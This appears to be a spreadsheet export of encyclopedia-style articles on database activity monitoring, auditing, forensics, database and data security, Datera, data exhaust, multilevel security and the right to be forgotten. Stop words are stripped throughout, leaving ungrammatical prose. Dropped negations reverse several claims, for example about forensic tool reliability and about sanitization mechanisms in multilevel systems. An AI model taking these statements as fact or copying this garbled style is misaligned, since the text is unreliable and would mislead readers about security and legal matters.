granular protection object level. core features defined gartner, “dam tools several data collection mechanisms (such server-based agent software in-line out-of-band network collectors), aggregate data central location analysis, report based behaviors violate security policies and/or signatures indicate behavioral anomalies. demand driven primarily need privileged user monitoring address compliance-related audit findings, threat-management requirements monitor database access. enterprise requirements beginning broaden, extending beyond basic functions, capability detect malicious activity inappropriate unapproved database administrator (dba) access.” more advanced functions include: ability monitor intra-database attacks back-doors real time (such stored procedures, triggers, views, etc.) solution agnostic infrastructure variables encryption network topology blocking prevention, without in-line transactions active discovery at-risk data improved visibility application traffic ability offer database activity monitoring virtualized environments, even cloud, well-defined consistent network topology some enterprises also seeking functions, including: configuration auditing comply audits required u.s. sarbanes-oxley capabilities address security concerns, well data identification protection requirements payment card industry (pci) data-centric regulatory frameworks database user rights attestation reporting, required broad range regulations ability offer database activity monitoring virtualized environments, even cloud, well-defined consistent network topology better integration vulnerability scanning products common architectures interception-based: most modern systems collect database able “see” communications database client database server. what systems find places view communication stream requests responses without requiring participation database. database security proxy non-intrusive method dam. interception done also multiple points database memory (e.g. sga), network (using network span port communication encrypted), operating system level, level database libraries.if unencrypted network traffic, packet sniffing used. advantage processing done host, however main disadvantage local traffic sophisticated intra-database attacks detected. capture local access network based vendors deploy probe runs host. this probe intercepts local access also intercept networked access case want network gear case database communications encrypted. however, since agent processing instead relays data appliance processing occurs impact network performance local traffic real-time session termination slow interrupt unauthorized queries. memory-based: some systems lightweight sensor attaches protected databases continuously polls system global area (sga) collect statements performed. similar architecture previously used performance optimization products also used shared data structures.in latest versions technology lightweight sensor runs host attaches process level inspect private data structures. advantages approach significant: complete coverage database transactions sensor covers traffic coming network, host, well back-doors (stored procedures, triggers, views) solution agnostic infrastructure variables need re-architect network, open span ports worry management network encrypted, model also used protect databases deployed virtualized environments cloudlog-based: some systems analyze extract information transaction logs (e.g., redo logs). these systems fact much data stored within redo logs scrape logs. unfortunately, information required redo logs. example, select statements systems augment data gather redo logs data collect native audit trails shown figure these systems hybrid true system (that fully independent dbms) siem relies data generated database. these architectures usually imply overhead database server. references</t>
  </si>
  <si>
    <t>Database audit</t>
  </si>
  <si>
    <t>database auditing involves observing database aware actions database users. database administrators consultants often auditing security purposes, example, ensure without permission access information access references further reading gallegos, gonzales, manson, senft. information technology control audit. second edition. boca raton, florida: press llc, 2000. ben-natan, gold consultant guardium cto. implementing database security auditing. digital press, 2005. mookhey (2005). audit. vol. auditing server security. audit. vol. murray mazer. database auditing-essential business practice today’s risk management 2005.</t>
  </si>
  <si>
    <t>Database forensics</t>
  </si>
  <si>
    <t>database forensics branch digital forensic science relating forensic study databases related metadata.the discipline similar computer forensics, following normal forensic process applying investigative techniques database contents metadata. cached information also exist servers requiring live analysis techniques. forensic examination database relate timestamps apply update time relational table inspected tested validity order verify actions database user. alternatively, forensic examination focus identifying transactions within database system application indicate evidence wrongdoing, fraud. software tools used manipulate analyse data. these tools also provide audit logging capabilities provide documented proof tasks analysis forensic examiner performed database. currently many database software tools general reliable precise enough used forensic work demonstrated first paper published database forensics. there currently single book published field, though destined. additionally subsequent server forensics book kevvie fowler named server forensics well regarded also.the forensic study relational databases requires knowledge standard used encode data computer disk. documentation standards used encode information well-known brands server oracle contributed public domain. others include apex analytix.because forensic analysis database executed isolation, technological framework within subject database exists crucial understanding resolving questions data authenticity integrity especially relates database users. further reading farmer venema, 1999, http://www.porcupine.org/forensics/forensic-discovery/appendixb.html sarbanes oxley section enforce financial standards limit chance fraud. http://thecaq.aicpa.org/resources/sarbanes+oxley/ hipaa health portability https://web.archive.org/web/20051219200504/http://www.cms.hhs.gov/hipaa/ fair credit reporting (fcra) http://www.gao.gov/new.items/d06674.pdf oracle forensics nutshell, paul wright (may 2007) http://www.oracleforensics.com/wordpress/wp-content/uploads/2007/03/oracleforensicsinanutshell.pdf oracle forensics, paul wright, rampant techpress, isbn 0-9776715-2-6, 2008. http://www.rampant-books.com/book_2007_1_oracle_forensics.htm references</t>
  </si>
  <si>
    <t>Database security</t>
  </si>
  <si>
    <t>database security concerns broad range information security controls protect databases (potentially including data, database applications stored functions, database systems, database servers associated network links) compromises confidentiality, integrity availability. involves various types categories controls, technical, procedural/administrative physical. security risks database systems include, example: unauthorized unintended activity misuse authorized database users, database administrators, network/systems managers, unauthorized users hackers (e.g. inappropriate access sensitive data, metadata functions within databases, inappropriate changes database programs, structures security configurations); malware infections causing incidents unauthorized access, leakage disclosure personal proprietary data, deletion damage data programs, interruption denial authorized access database, attacks systems unanticipated failure database services; overloads, performance constraints capacity issues resulting inability authorized users databases intended; physical damage database servers caused computer room fires floods, overheating, lightning, accidental liquid spills, static discharge, electronic breakdowns/equipment failures obsolescence; design flaws programming bugs databases associated programs systems, creating various security vulnerabilities (e.g. unauthorized privilege escalation), data loss/corruption, performance degradation etc.; data corruption and/or loss caused entry invalid data commands, mistakes database system administration processes, sabotage/criminal damage etc.ross anderson often said nature large databases never free abuse breaches security; large system designed ease access becomes insecure; made watertight becomes impossible use. this sometimes known anderson's rule.many layers types information security control appropriate databases, including: access control auditing authentication encryption integrity controls backups application security database security applying statistical methoddatabases largely secured hackers network security measures firewalls, network-based intrusion detection systems. while network security controls remain valuable regard, securing database systems themselves, programs/functions data within them, arguably become critical networks increasingly opened wider access, particular access internet. furthermore, system, program, function data access controls, along associated user identification, authentication rights management functions, always important limit cases activities authorized users administrators. words, complementary approaches database security, working outside-in inside-out were. many organizations develop "baseline" security standards designs detailing basic security control measures database systems. these reflect general information security requirements obligations imposed corporate information security policies applicable laws regulations (e.g. concerning privacy, financial management reporting systems), along generally accepted good database security practices (such appropriate hardening underlying systems) perhaps security recommendations relevant database system software vendors. security designs specific database systems typically specify security administration management functions (such administration reporting user access rights, management analysis, database replication/synchronization backups) along various business-driven information security controls within database programs functions (e.g. data entry validation audit trails). furthermore, various security-related activities (manual controls) normally incorporated procedures, guidelines etc. relating design, development, configuration, use, management maintenance databases. privileges types privileges important relating database security within database environment: system privileges object privileges. system privileges system privileges allow user perform administrative actions database. object privileges object privileges allow certain operations database objects authorized another user. examples include: usage, select, insert, update, references.the principal least privilege, separation duties: databases fall internal controls (that data used public reporting, annual reports, etc.) subject separation duties, meaning must segregation tasks development, production. each task validated (via code walk-through/fresh eyes) third person writing actual code. database developer able execute anything production without independent review documentation/code work performed. typically, role developer pass code dba; however, given cutbacks resulted economic downturn, might readily available. involved, important, minimum, peer conduct code review. this ensures role developer clearly separate.another point internal control adherence principle providing least amount privileges, especially production. allow developers access work done, much safer impersonation exceptions require elevated privileges (e.g. execute sudo temporarily). often developers dismiss “overhead” path coding glory. please aware, however, dbas must considered responsible facto data stewards organization must comply regulations law. vulnerability assessments manage risk compliance technique evaluating database security involves performing vulnerability assessments penetration tests database. testers attempt find security vulnerabilities could used defeat bypass security controls, break database, compromise system etc. database administrators information security administrators example automated vulnerability scans search misconfiguration controls (often referred 'drift') within layers mentioned along known vulnerabilities within database software. results scans used harden database (improve security) close specific vulnerabilities identified, vulnerabilities often remain unrecognized unaddressed. database environments security critical, continual monitoring compliance standards improves security. security compliance requires, amongst procedures, patch management review management permissions (especially public) granted objects within database. database objects include table objects listed table link. permissions granted language commands objects considered process. compliance monitoring similar vulnerability assessment, except results vulnerability assessments generally drive security standards lead continuous monitoring program. essentially, vulnerability assessment preliminary procedure determine risk compliance program process on-going risk assessment. compliance program take consideration dependencies application software level changes database level effects application software application server. abstraction application level authentication authorization mechanisms effective means providing abstraction database layer. primary benefit abstraction single sign-on capability across multiple databases platforms. single sign-on system stores database user's credentials authenticates database behalf user. abstraction idea making complex ideas easier understand. database activity monitoring (dam) another security layer sophisticated nature includes real-time database activity monitoring, either analyzing protocol traffic (sql) network, observing local database activity server using software agents, both. agents native logging required capture activities executed database server, typically include activities database administrator. agents allow information captured fashion disabled database administrator, ability disable modify native audit logs. analysis performed identify known exploits policy breaches, baselines captured time build normal pattern used detection anomalous activity could indicative intrusion. these systems provide comprehensive database audit trail addition intrusion detection mechanisms, systems also provide protection terminating user sessions and/or quarantining users demonstrating suspicious behavior. some systems designed support separation duties (sod), typical requirement auditors. requires database administrators typically monitored part dam, able disable alter functionality. this requires audit trail securely stored separate system administered database administration group. native audit addition using external tools monitoring auditing, native database audit capabilities also available many database platforms. native audit trails extracted regular basis transferred designated security system database administrators do/should access. this ensures certain level segregation duties provide evidence native audit trails modified authenticated administrators, conducted security-oriented senior group read rights production. turning native impacts performance server. generally, native audit trails databases provide sufficient controls enforce separation duties; therefore, network and/or kernel module level host based monitoring capabilities provides higher degree confidence forensics preservation evidence. process procedures good database security program includes regular review privileges granted user accounts accounts used immediate processes. individual accounts two-factor authentication system improves security adds complexity cost. accounts used automated processes require appropriate controls around password storage sufficient encryption access controls reduce risk compromise. conjunction sound database security program, appropriate disaster recovery program ensure service interrupted security incident, incident results outage primary database environment. example replication primary databases sites located different geographical regions.after incident occurs, database forensics employed determine scope breach, identify appropriate changes systems processes. also negative database database firewall fips 140-2 federal standard authenticating cryptography module virtual private database references external links https://web.archive.org/web/20080511155031/http://iase.disa.mil/stigs/checklist/index.html https://web.archive.org/web/20080515131426/http://iase.disa.mil/stigs/stig/index.html</t>
  </si>
  <si>
    <t>Data security</t>
  </si>
  <si>
    <t>data security means protecting digital data, database, destructive forces unwanted actions unauthorized users, cyberattack data breach. technologies disk encryption disk encryption refers encryption technology encrypts data hard disk drive. disk encryption typically takes form either software (see disk encryption software) hardware (see disk encryption hardware). disk encryption often referred on-the-fly encryption (otfe) transparent encryption. software versus hardware-based mechanisms protecting data software-based security solutions encrypt data protect theft. however, malicious program hacker could corrupt data order make unrecoverable, making system unusable. hardware-based security solutions prevent read write access data, provides strong protection tampering unauthorized access. hardware based security assisted computer security offers alternative software-only computer security. security tokens using pkcs#11 secure physical access required order compromised. access enabled token connected correct entered (see two-factor authentication). however, dongles used anyone gain physical access newer technologies hardware-based security solve problem offering full proof security data.working hardware-based security: hardware device allows user different levels manual actions. device uses biometric technology prevent malicious users logging logging out, changing privilege levels. current state user device read controllers peripheral devices hard disks. illegal access malicious user malicious program interrupted based current state user hard disk controllers making illegal access data impossible. hardware-based access control secure protection provided operating systems operating systems vulnerable malicious attacks viruses hackers. data hard disks corrupted malicious access obtained. with hardware-based protection, software cannot manipulate user privilege levels. impossible hacker malicious program gain access secure data protected hardware perform unauthorized privileged operations. this assumption broken hardware malicious contains backdoor. hardware protects operating system image file system privileges tampered with. therefore, completely secure system created using combination hardware-based security secure system administration policies. backups backups used ensure data lost recovered another source. considered essential keep backup data industries process recommended files importance user. data masking data masking structured data process obscuring (masking) specific data within database table cell ensure data security maintained sensitive information exposed unauthorized personnel. this include masking data users (for example banking customer representatives last four digits customers national identity number), developers (who need real production data test software releases able sensitive financial data), outsourcing vendors, etc. data erasure data erasure method software based overwriting completely wipes electronic data residing hard drive digital media ensure sensitive data lost asset retired reused. international laws standards international laws data protection used ensure personal data accessible concerns, provides redress individuals inaccuracies. this particularly important ensure individuals treated fairly, example credit checking purposes. data protection states individuals companies legitimate lawful reasons process personal information cannot shared. data privacy international holiday started council europe occurs every january since general data protection regulation (gdpr) european union (eu) became 2018, organizations face significant penalties million annual revenue comply regulation. intended gdpr force organizations understand data privacy risks take appropriate measures reduce risk unauthorized disclosure consumers’ private information. international standards international standards iso/iec 27001:2013 iso/iec 27002:2013 cover data security topic information security, cardinal principles stored information, i.e. data, owned clear whose responsibility protect control access data. following examples organizations help strengthen standardize computing security: trusted computing group organization helps standardize computing security technologies. payment card industry data security standard (pci dss) proprietary international information security standard organizations handle cardholder information major debit, credit, prepaid, e-purse, automated teller machines, point sale cards.the general data protection regulation (gdpr) proposed european commission strengthen unify data protection individuals within whilst addressing export personal data outside also notes references external links getting ready data laws local magazine general data protection regulation (gdpr) countering ransomware attacks data security daily optimization operations heavy industries sotaog</t>
  </si>
  <si>
    <t>Datera</t>
  </si>
  <si>
    <t>datera global enterprise software company headquartered santa clara, california developed enterprise software-defined storage platform. datera went liquidation february 2021.the datera data services platform company's commercial product aimed hyperscale storage environments cloud service providers want deploy hybrid cloud, autonomous dynamic data infrastructure. datera software deploys industry-standard servers dell emc, fujitsu, hewlett packard enterprise, intel, lenovo, supermicro, quanta store blocks objects on-premises data centers, private cloud hybrid cloud environments. history datera co-founded 2013 contributors open-source lio_(scsi_target) storage, nicholas bellinger, claudio fleiner marc fleischmann. 2016, datera emerged stealth raised million funding khosla ventures, samsung ventures, andy bechtolsheim, pradeep sindhu.datera partnered open source private cloud platform, vscaler 2017 deliver scalable private clouds range workloads high-performance databases archival storage.guy churchward, former datatorrent divisional president core technologies dell emc, joined datera board directors 2018 appointed december year. flavio santoni, former corporation former syncsort, appointed chief revenue officer january 2017. narasimha valiveti, former software engineering dell appointed chief product officer 2018. january 2019, datera announced go-to-market partnership hewlett packard enterprise part complete program allow businesses procure integrated solutions single purchase order. datera reported percent business growth first half 2019 attributed partnership.in october 2019, datera announced datera cloud partnership hpe, pre-packaged configuration customers included datera software license, smart fabric orchestrator license, m-series switches, dl360 servers, cabling, support containers, virtual machines, bare metal applications. company named emerging storage vendor 2019.in 2020, datera achieved “veeam-ready” designation repository category. program (from backup solutions cloud data management provider, veeam) signifies company partners standards “qualification testing program” certified work conjunction another. platform also received openstack certification datera cinder driver openstack platform openstack platform 16.the company announced partner agreement fujitsu integrate datera data services platform fujitsu’s product portfolio bring market globally.on april 2020, datera co-founder marc fleishmann announced departure datera pursue opportunities linkedin posting.on february 2021, blockandfiles.com reported datera gone liquidation. technology datera's principal product block, scale-out software-defined storage platform transaction-intensive workloads utilizes iscsi protocol. provides elastic, primary storage on-premises data centers, private hybrid cloud environments. enterprises combine different hardware media multiple vendors create distributed, scale-out storage clusters workloads running bare metal, virtual machines, containers. software also uses automation data orchestration place data location, node, media type continuously tuning performance application. company states eliminates need manual administration. datera uses artificial intelligence machine learning assess organization's data environment automatically takes actions optimize user-defined policies.datera natively integrates openstack, vmware vsphere, cloudstack container orchestration platforms docker, kubernetes, mesos. references</t>
  </si>
  <si>
    <t>Data exhaust</t>
  </si>
  <si>
    <t>data exhaust exhaust data trail data left activities internet computer system users online activity, behavior, transactions. this part broader category unconventional data includes geospatial, network, time-series data useful predictive analytics. every visited website, clicked link, even hovering mouse collected, leaving behind trail data. enormous amount often data created, form cookies, temporary files, logfiles, storable choices, more. this information help improve online experience, example customized content. used improve tracking trends studying data exhaust also improves user interface layout design. hand, also compromise privacy, offer valuable insight user's habits. example, world's popular website, google, uses data exhaust refine predictive value products.the data collected companies often information seem immediately useful. although information used company right away, stored future sold someone else information. data help quality control, performance, revenue.unlike primary content, data purposefully created user, often unaware existence. bank example would consider primary data information concerning sums parties transaction, whilst secondary data might include percentage transactions carried cash machine instead real bank. medical exhaust data most medical devices emit form exhaust data, many pacemakers, dialysis machines, cameras used surgery. majority data never captured, primarily abandoned surgery completed, device makes next routine check. some issues arisen regarding data captured devices like pacemakers. this lead larger issues surrounding exhaust data. using electronic medical records (emr) research poses large number challenges, prevalent amount data this surplus data much people sort analyze, thus creating need algorithms. solutions although data exhaust concept, ubiquity internet-enabled gadgetry exacerbated scope impacts passive digital trail. collection distribution data thus generated illegal, steps must taken ensure data ethical. order ensure privacy users, information sold anonymized. also, users given opportunity opt-out selling information choose. lastly, build trust, websites update privacy policies include data collecting user. also alternative data references</t>
  </si>
  <si>
    <t>Multilevel security</t>
  </si>
  <si>
    <t>multilevel security multiple levels security (mls) application computer system process information incompatible classifications (i.e., different security levels), permit access users different security clearances needs-to-know, prevent users obtaining access information lack authorization. there contexts multilevel security. refer system adequate protect subversion robust mechanisms separate information domains, trustworthy. another context refer application computer require computer strong enough protect subversion possess adequate mechanisms separate information domains, system must trust. this distinction important systems need trusted necessarily trustworthy. trusted operating systems operating environment often requires highly trustworthy information processing system often built operating system (os), necessarily. most functionality supported system composed entirely untrusted computers, although requires multiple independent computers linked hardware security-compliant channels (see section b.6.2 trusted network interpretation, ncsc-tg-005). example hardware enforced asymmetric isolation. computer used mode, computer must trusted operating system (os). because information environment physically accessible strong logical controls must exist ensure access information strictly controlled. typically involves mandatory access control uses security labels, like bell–lapadula model. customers deploy trusted operating systems typically require product complete formal computer security evaluation. evaluation stricter broader security range, lowest highest classification levels system process. trusted computer system evaluation criteria (tcsec) first evaluation criteria developed assess computer systems. under criteria clear uniform mapping security requirements breadth security range. historically implementations certified capable processing security range unclassified secret. among honeywell's scomp, usaf sacdin, nsa's blacker, boeing's lan, tcsec, 1980s vintage intel 80386-based. currently, products evaluated common criteria. late 2008, first operating system (more below) certified high evaluated assurance level: evaluation assurance level (eal) high robustness, auspices u.s. government program requiring multilevel security high threat environment. while assurance level many similarities orange book (such formal methods), functional requirements focus fundamental isolation information flow policies rather higher level policies bell-la padula. because common criteria decoupled tcsec's pairing assurance (eal) functionality (protection profile), clear uniform mapping security requirements security range capability documented csc-std-004-85 largely lost common criteria superseded rainbow series. freely available operating systems features support include linux security-enhanced linux feature enabled freebsd. security evaluation thought problem free implementations three reasons: always difficult implement kernel self-protection strategy precision needed trust, examples designed certified protection profile offer self-protection needed support mls. aside levels, common criteria lacks inventory appropriate high assurance protection profiles specify robustness needed operate mode. even met, evaluation process costly imposes special restrictions configuration control evaluated software.notwithstanding suppositions, enterprise linux certified lspp, rbacpp, capp eal4+ june 2007. uses security-enhanced linux implement first common criteria certification enforce security properties security-enhanced linux. vendor certification strategies misleading laypersons. common strategy exploits layperson's overemphasis level over-certification, certifying protection profile (like capp) elevated levels, like another adding certifying support features (such role-based access control protection profile (rbacpp) labeled security protection profile (lspp)) kernel evaluated mls-capable protection profile. those types features services kernel depend kernel protect corruption subversion. kernel evaluated mls-capable protection profile, features cannot trusted regardless impressive demonstration looks. particularly noteworthy capp specifically mls-capable profile specifically excludes self-protection capabilities critical mls. general dynamics offers pitbull, trusted, operating system. pitbull currently offered enhanced version enterprise linux, earlier versions existed microsystems solaris, aix, svr4 unix. pitbull provides bell lapadula security mechanism, biba integrity mechanism, privilege replacement superuser, many features. pitbull security base general dynamics' trusted network environment (tne) product since 2009. enables multilevel information sharing access users department defense intelligence communities operating varying classification levels. it's also foundation multilevel coalition sharing environment, battlefield information collection exploitation systems extended (bices-x). microsystems, oracle corporation, offers solaris trusted extensions integrated feature commercial solaris opensolaris. addition controlled access protection profile (capp), role-based access control (rbac) protection profiles, trusted extensions also certified eal4 labeled security protection profile (lspp). security target includes desktop network functionality. lspp mandates users authorized override labeling policies enforced kernel window system (x11 server). evaluation include covert channel analysis. because certifications depend capp, common criteria certifications suggest product trustworthy mls. systems offers xts-400, commercial system supports vendor claims "high assurance". predecessor products (including xts-300) evaluated tcsec level, mls-capable. xts-400 evaluated common criteria eal5+ capp lspp protection profiles. capp lspp eal3 protection profiles inherently mls-capable, security target common criteria evaluation product contains enriched security functions provide capability. problem areas sanitization problem area systems. systems implement restrictions, like defined bell–lapadula model, allow sharing obviously violate security restrictions. users lower clearances easily share work users holding higher clearances, vice versa. there efficient, reliable mechanism secret user edit secret file, remove secret information, deliver users secret lower clearances. practice, systems circumvent problem privileged functions allow trustworthy user bypass mechanism change file's security classification. however, technique reliable. covert channels pose another problem systems. system keep secrets perfectly, must possible secret process transmit signals kind secret lower process. this includes side effects changes available memory disk space, changes process timing. when process exploits side effect transmit data, exploiting covert channel. extremely difficult close covert channels practical computing system, impossible practice. process identifying covert channels challenging itself. most commercially available systems attempt close covert channels, even though makes impractical high security applications. bypass problematic introduced means treat system high object trusted. common example extract data secret system high object sent unclassified destination, citing property data trusted evidence 'really' unclassified (e.g. 'strict' format). system high system cannot trusted preserve trusted evidence, result overt data path opened logical securely mediate bypass risky because, unlike narrow bandwidth covert channels difficult exploit, bypass present large, easily exploitable overt leak system. bypass often arises failure trusted operating environments maintain continuous separation security domains back origin. when origin lies outside system boundary, possible validate trusted separation origin. case, risk bypass unavoidable flow truly essential. common example unavoidable bypass subject system required accept secret packets untrusted source, encrypt secret userdata header deposit result untrusted network. source lies outside sphere influence subject system. although source untrusted (e.g. system high) trusted provides packets unclassified headers secret plaintext userdata, data construct. since source untrusted, could corrupt place secrets unclassified packet header. corrupted packet headers could nonsense impossible subject system determine reasonable reliability. packet userdata cryptographically well protected packet header contain readable secrets. corrupted packets passed untrusted network subject system routable cooperating corrupt process network could grab packets acknowledge subject system detect leak. this large overt leak hard detect. viewing classified packets unclassified headers system high structures instead structures really presents common serious threat. most bypass avoidable. avoidable bypass often results system architects design system correctly considering security, attempt apply security fact add-on functions. situation, bypass appears (easy) make system work. some pseudo-secure schemes proposed (and approved!) examine contents bypassed data vain attempt establish bypassed data contains secrets. this possible without trusting something data format, contrary assumption source trusted preserve characteristics source data. assured "secure bypass" myth, so-called high assurance guard (hag) transparently implements bypass. risk introduce long acknowledged; extant solutions ultimately procedural, rather technical. there know certainty much classified information taken systems exploitation bypass. "there thing mls" there decline compusec experts term overloaded. laypersons designing secure computing systems drawing conclusion exist. these uses are: processing environment capability. belief non-existent based belief products certified operate environment mode therefore capability exist. imply other. many systems operate environment containing data unequal security levels therefore computer security intermediate value theorem (cs-ivt). consequence confusion runs deeper. nsa-certified operating systems, databases, networks existed operational mode since 1970s products continuing built, marketed, deployed. laypersons often conclude admit system operates environment (environment-centric meaning mls) backed perceived corner problem solution (capability-centric meaning mls). deceptively complex simple solutions obvious justify conclusion exist. this lead crippling ignorance compusec manifests whispers "one cannot talk mls," "there's thing mls." these mls-denial schemes change rapidly cannot addressed. instead, important clarify distinction mls-environment mls-capable. security environment security mode: community whose users differing security clearances perceive data sharing capability: users share information recipients whose clearance allows receipt information. system operating mode could have) connectivity destination cleared lower security level data system contains. this formalized cs-ivt. determination security mode system depends entirely system's security environment; classification data contains, clearance direct indirect access system outputs signals, system's connectivity ports systems. security mode independent capabilities, although system operated mode worthy trust. capability: developers products systems intended allow data sharing tend loosely perceive terms capability enforce data-sharing restrictions security policy, like mechanisms enforce bell–lapadula model. system mls-capable shown robustly implement security policy.the original term applied security environment, mode. solution confusion retain original definition specific mls-capable context used. mils architecture multiple independent levels security (mils) architecture addresses domain separation component mls. note ucdmo (the government lead cross domain multilevel systems) created term cross domain access category baseline intelligence community accredited systems, category seen essentially analogous mils. security models biba model (for integrity) bell–lapadula model (for confidentiality) allow one-way flow certain security domains otherwise assumed isolated. mils addresses isolation underlying without addressing controlled interaction domains addressed models. trusted security-compliant channels mentioned link mils domains support functionality. mils approach pursues strategy characterized older term, (multiple single level), isolates level information within single-level environment (system high). rigid process communication isolation offered mils useful ultra high reliability software applications mls. mils notably address hierarchical structure embodied notion security levels. this requires addition specific import/export applications domains needs accredited appropriately. such, mils might better called multiple independent domains security (mls emulation mils would require similar accredited applications applications). declining address interaction among levels consistent hierarchical relations bell-la padula, mils (almost deceptively) simple implement initially needs non-trivial supplementary import/export applications achieve richness flexibility expected practical applications. mils/mls comparison consider accreditation simpler export applications achievable accreditation one, complex kernel. this question depends part extent import/export interactions stakeholders require. favour mils possibility export applications require maximal assurance. systems there another solving problems known multiple single-level. each security level isolated separate untrusted domain. absence medium communication domains assures interaction possible. mechanism isolation usually physical separation separate computers. this often used support applications operating systems possibility supporting microsoft windows. applications infrastructure trusted operating systems important component systems, order fulfill criteria required definition cnssi 4009 (paraphrased start article), system must provide user interface capable allowing user access process content multiple classification levels system. ucdmo track specifically focused information assurance symposium 2009, highlighted several accredited production) emergent systems. note selinux.there several databases classified systems. oracle product named oracle label security (ols) implements mandatory access controls typically adding 'label' column table oracle database. deployed army inscom foundation "all-source" intelligence database spanning jwics siprnet networks. there project create labeled version postgresql, also older labeled-database implementations trusted rubix. these database systems provide unified back-end system content spanning multiple labels, resolve challenge users process content multiple security levels system enforcing mandatory access controls. there also several end-user applications. capability currently ucdmo baseline called mlchat archived 2013-03-17 wayback machine, chat server runs xts-400 operating system created naval research laboratory. given content users different domains passes mlchat server, dirty-word scanning employed protect classified content, debate truly system form cross-domain transfer data guard. mandatory access controls maintained combination xts-400 application-specific mechanisms.joint cross domain exchange (jcdx) another example capability currently ucdmo baseline. jcdx department defense (dod), defense intelligence agency (dia) accredited multilevel security (mls) command, control, communication, computers intelligence (c4i) system provides near real-time intelligence warning support theater forward deployed tactical commanders. jcdx architecture comprehensively integrated high assurance protection level four (pl4) secure operating system, utilizing data labeling disseminate near real-time data information force activities potential terrorist threats around world's oceans. installed locations united states allied partner countries capable providing data secret/sci secret-releasable levels, single platform. applications currently part ucdmo baseline include several applications bluespace. bluespace several applications, including email client, search application system. bluespace leverages middleware strategy enable applications platform neutral, orchestrating user interface across multiple windows instances (virtualized remote terminal sessions). naval research laboratory also implemented multilevel application framework called mlweb integrates ruby rails framework multilevel database based sqlite3. future perhaps greatest change going multilevel security arena today convergence virtualization. increasing number trusted operating systems moving away labeling files processes, instead moving towards unix containers virtual machines. examples include zones solaris padded cell hypervisor systems green hill's integrity platform, xenclient citrix. high assurance platform implemented general dynamics' trusted virtualization environment (tve) another example uses selinux core, support applications span multiple domains. also bell–lapadula model biba model, biba integrity model clark–wilson model discretionary access control (dac) evaluation assurance level (eal) graham-denning model mandatory access control (mac) multi categories security (mcs) multifactor authentication non-interference (security) model role-based access control (rbac) security modes operation system high mode take-grant model references further reading lampson, (1973). note confinement problem". communications acm. (10): 613–615. citeseerx 10.1.1.129.1549. doi:10.1145/362375.362389. s2cid 9355455. ncsc (1985). "trusted computer system evaluation criteria". national computer security center. {{cite journal}}: cite journal requires |journal= (help) (a.k.a. tcsec "orange book"). ncsc (1986). "trusted network interpretation". national computer security center. {{cite journal}}: cite journal requires |journal= (help) (a.k.a. "red book"). smith, richard (2005). "chapter 205: multilevel security". hossein bidgoli (ed.). handbook information security, volume threats, vulnerabilities, prevention, detection management. york: john wiley. archived original 2006-05-06. retrieved 2006. isbn 0-471-64832-9. patel, collins, vanfleet, calloni, wilding, maclearn, luke, (november 2002). "deeply embedded high assurance (multiple independent levels security/safety) mils architecture" (pdf). center research economic development policy reform. archived original (pdf) april 2003. retrieved 2005-11-06. {{cite journal}}: cite journal requires |journal= (help)cs1 maint: multiple names: authors list (link) loscocco, smalley, muckelbauer, taylor, turner, farrell. inevitability failure: flawed assumption security modern computing environments. proceedings 21st national information systems security conference, pages 303–314, oct. 1998. [2]. external links first rtos integrity 178b certified support mils integrity 178b product page pitbull trusted operating system</t>
  </si>
  <si>
    <t>Right to be forgotten</t>
  </si>
  <si>
    <t>right forgotten (rtbf) right private information person removed internet searches directories circumstances. concept discussed practice several jurisdictions, including argentina, european union (eu), philippines. issue arisen desires individuals "determine development life autonomous way, without perpetually periodically stigmatized consequence specific action performed past.": there controversy practicality establishing right forgotten respect access information) international human right. this partly vagueness current rulings attempting implement right. furthermore, concerns impact right freedom expression, interaction right privacy, whether creating right forgotten would decrease quality internet censorship rewriting history. those favor right forgotten cite necessity issues revenge porn sites appearing search engine listings person's name, well instances results referencing petty crimes individuals committed past. central concern lies potentially undue influence results exert upon person's online reputation almost indefinitely removed.the right forgotten "reflects claim individual certain data deleted third persons longer trace them.": defined "the right silence past events life longer occurring." right forgotten leads allowing individuals information, videos, photographs deleted certain internet records cannot found search engines. 2011 protections harm incidents revenge porn sharing, pictures uploaded poor judgement.the right forgotten distinct right privacy. right privacy constitutes information publicly known, whereas right forgotten involves removing information publicly known certain time allowing third parties access information.: limitations application jurisdiction include inability require removal information held companies outside jurisdiction. there global framework allow individuals control online image. however, professor viktor mayer-schönberger, expert oxford internet institute, university oxford, said google cannot escape compliance france implementing decision european court justice 2014 right forgotten. mayer-schönberger said nations, including long maintained local laws "extra-territorial effects". recognition jurisdiction argentina argentina seen lawsuits celebrities google yahoo! plaintiffs demand removal certain search results, require removal links photographs. case, brought artist virginia cunha, involved photographs originally taken permission uploaded permission, however alleged search results improperly associated photographs pornography. cunha's case achieved initial success resulting argentina search engines showing images particular celebrity, however, decision appeal.virginia simari, judge favor cunha, stated people right control image avert others "capturing, reproducing, broadcasting, publishing one's image without permission." addition, simari used treatise written julio césar rivera, buenos aires lawyer, author, professor "the right control one's personal data includes right prevent others using one's image." since 1990s argentina also part habeas data movement "adopted constitutional provision part freedom-of-government-information part data privacy law." their version known amparo. article explains "any person shall file action obtain information data purpose, registered public records databases, private ones intended supply information; case false data discrimination, action filed request suppression, rectification, confidentiality updating said data."argentina's efforts protect people's right forgotten called "the complete" individuals able correct, delete, update information themselves. overall, information bound remain confidential. china 2016, chinese courts beijing determined citizens right forgotten judge ruled favor baidu lawsuit removing search results. first cases heard chinese court. suit, jiayu sued chinese search engine baidu search results associated previous employer, wuxi taoshi biotechnology. argued posting search results, baidu infringed upon right name right reputation, protected chinese law. because protections, believed right forgotten removing search results. court ruled ren, claiming name collection common characters result search results derived relevant words.nowhere china's civil code concepts privacy right forgotten discussed. there data protection authority, specific state agency place monitor protection citizens' personal data. china today, data protection regulation aimed consumers, individual level, contrast eu's right privacy, individual considered "data subject", right protected. chinese legislative progress towards supporting right forgotten slow. topic debated years now, continues challenge. small provisions implemented related personal data processing, amount comprehensive data protection regime. european union directorate-general internal policies issued policy recommendations realistic, rather legalistic basis data protection transfer data china vis-a-vis latter's lack compatible regulation area. european union europe's data protection laws intended secure potentially damaging private information individuals instead "right forgotten" limited "right [data] erasure" implemented. notion "the right forgotten" derived numerous pre-existing european ideas. there longstanding belief united kingdom, specifically rehabilitation offenders act, certain period time, many criminal convictions "spent", meaning information regarding said person regarded obtaining insurance seeking employment. similarly, france values right droit l'oubli (the right forgotten) officially recognized french 2010. views right forgotten differ greatly united states countries. united states, transparency, right free speech according first amendment, "right know" typically favored removing increasing difficulty access truthfully published information regarding individuals corporations. although term "right forgotten" relatively idea, european court justice legally solidified "right forgotten" human right ruled google costeja case 2014.in 1995, european union adopted european data protection directive (directive 95/46/ec) regulate processing personal data. this considered component human rights law. european proposal general data protection regulation 